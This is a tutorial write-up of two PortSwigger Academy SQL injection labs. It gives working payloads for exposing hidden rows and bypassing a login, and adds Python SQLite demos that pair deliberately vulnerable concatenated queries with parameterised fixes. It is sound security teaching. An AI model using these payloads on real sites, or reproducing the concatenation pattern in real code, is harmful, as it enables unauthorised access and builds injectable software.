Labs Covered
This write-up focuses on the following APPRENTICE-level labs from the PortSwigger Web Security Academy related to SQL Injection:
1 SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab demonstrates how an attacker can exploit SQL injection in the WHERE clause to extract data that is normally hidden or filtered.
2 SQL injection vulnerability allowing login bypass
This lab shows how SQL injection can be used to bypass authentication mechanisms and gain unauthorized access.
LAB 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Lab Description
Solution
Clicking a category button filters the products by category, so we navigate to Gifts:
Query made -
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
The above is done with a GET request:
Sending the payload Gifts'-- as the category, we get 4 items instead of only 3: the quote closes the string literal and -- comments out the rest of the WHERE clause, so AND released = 1 is never applied and the hidden Gifts item is returned along with the released ones.
To view every product (released and unreleased, in every category), we send Gifts' OR 1=1-- so that the WHERE condition is always true and the filter returns all rows, not only the gifts.
The query looks like
SELECT * FROM products WHERE category = 'Gifts' OR 1=1 --' AND released = 1
NOTE - URL-encode the payload before forwarding the request (a space becomes + or %20, ' becomes %27, = becomes %3D). A raw space in the query string splits the HTTP request line and the server rejects the request, and a raw # would start the URL fragment and never reach the application, which is why -- is the comment sequence used here.
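The behaviour above, reproduced against an in-memory SQLite database. This is an added example, not code from the lab or from PortSwigger: search_vulnerable builds the WHERE clause by string concatenation the way the lab's back end does, search_safe uses a bound parameter instead, and query_string shows the URL-encoded form the GET request needs. The products table is constructed sample data, not the lab's own rows.

```python
import sqlite3
from urllib.parse import urlencode

# Constructed sample rows standing in for the lab's products table.
PRODUCTS = [
    ("Gifts", "Mug", 1),
    ("Gifts", "Pen", 1),
    ("Gifts", "Hidden gift", 0),        # released = 0: normally filtered out
    ("Pets", "Leash", 1),
    ("Pets", "Unreleased toy", 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn, category):
    # The category parameter is pasted straight into the SQL text, so a
    # quote in it ends the string literal and everything after is SQL.
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, category):
    # Bound parameter: the value is never parsed as SQL, so "Gifts'--" is
    # just a category name that matches nothing.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def query_string(category):
    # The encoded GET query string: space -> +, ' -> %27, = -> %3D, -- unchanged.
    return urlencode({"category": category})


if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "Gifts"))            # only released gifts
    print(search_vulnerable(db, "Gifts'--"))         # released = 1 commented out
    print(search_vulnerable(db, "Gifts' OR 1=1--"))  # every product, every category
    print(search_safe(db, "Gifts' OR 1=1--"))        # nothing: the payload is inert
    print(query_string("Gifts' OR 1=1--"))
```

The parameterised query is the fix: the database receives the payload as a value, compares it against the category column, and finds no match.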
LAB 2 - SQL injection vulnerability allowing login bypass
Lab Description
Solution
First we log in as a random user and capture the request:
The login functionality works with a POST request:
Query made -
SELECT * FROM users WHERE username = 'test' AND password = 'test'
To bypass the login, we comment out the password check in the WHERE clause with --, so only the username is compared:
SELECT * FROM users WHERE username = 'administrator'--' AND password = 'test'
Alternatively, we supply the correct username and make the password condition true. The + in that payload is the form encoding of a space, so the query the server builds is:
SELECT * FROM users WHERE username = 'administrator' AND password = '' or '1'='1'
Note that AND binds tighter than OR, so this WHERE clause is true for every row in users and the application logs in as whichever row it reads first; the -- payload is the precise one.
Using the following payload in the password field it is possible to log in:
'+or'1'='1
Lab is solved
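The two login payloads, run against a constructed SQLite users table. This is an added example, not the lab's code; the wiener account and the administrator password are invented for it. login_vulnerable builds the query by concatenation as the lab does and returns the first matching row, which is how most login code picks the account; form_body and login_from_body show that the + in the payload is only the form encoding of a space. It also shows why the comment payload is the precise one: with ' or '1'='1 in the password the WHERE clause is true for every row, so the account you get depends on row order.

```python
import sqlite3
from urllib.parse import urlencode, parse_qs

# Constructed users table: the wiener account and the administrator
# password are invented for this example, not the lab's data.
USERS = [
    ("wiener", "peter"),
    ("administrator", "not-the-real-password"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def matching_users(conn, username, password):
    # Concatenated query, as in the lab: both fields are parsed as SQL.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_vulnerable(conn, username, password):
    # Typical login code: the first row that comes back is the session user.
    rows = matching_users(conn, username, password)
    return rows[0] if rows else None


def login_safe(conn, username, password):
    # Bound parameters: neither payload is ever interpreted as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    rows = conn.execute(sql, (username, password)).fetchall()
    return rows[0][0] if rows else None


def form_body(username, password):
    # The POST body as the browser or Burp sends it: space -> +, ' -> %27.
    return urlencode({"username": username, "password": password})


def login_from_body(conn, body):
    # Server side: the form is decoded first, then the vulnerable query is built.
    fields = parse_qs(body)
    return login_vulnerable(conn, fields["username"][0], fields["password"][0])


if __name__ == "__main__":
    db = make_db()
    # Payload 1: comment out the password check.
    print(login_vulnerable(db, "administrator'--", "anything"))      # administrator
    # Payload 2: ' or '1'='1 in the password. AND binds tighter than OR, so
    # (username = 'administrator' AND password = '') OR '1'='1' is true for
    # every row and the first user in the table wins.
    print(matching_users(db, "administrator", "' or '1'='1"))        # ['wiener', 'administrator']
    print(login_vulnerable(db, "administrator", "' or '1'='1"))      # wiener
    print(form_body("administrator", "' or '1'='1"))                 # password=%27+or+%271%27%3D%271
    print(login_from_body(db, form_body("administrator'--", "x")))   # administrator
    print(login_safe(db, "administrator'--", "anything"))             # None
```

In the constructed table wiener is the first row, so the OR payload logs in as wiener rather than administrator; whether the same happens on the lab depends on its row order, which is why administrator'-- is the reliable choice.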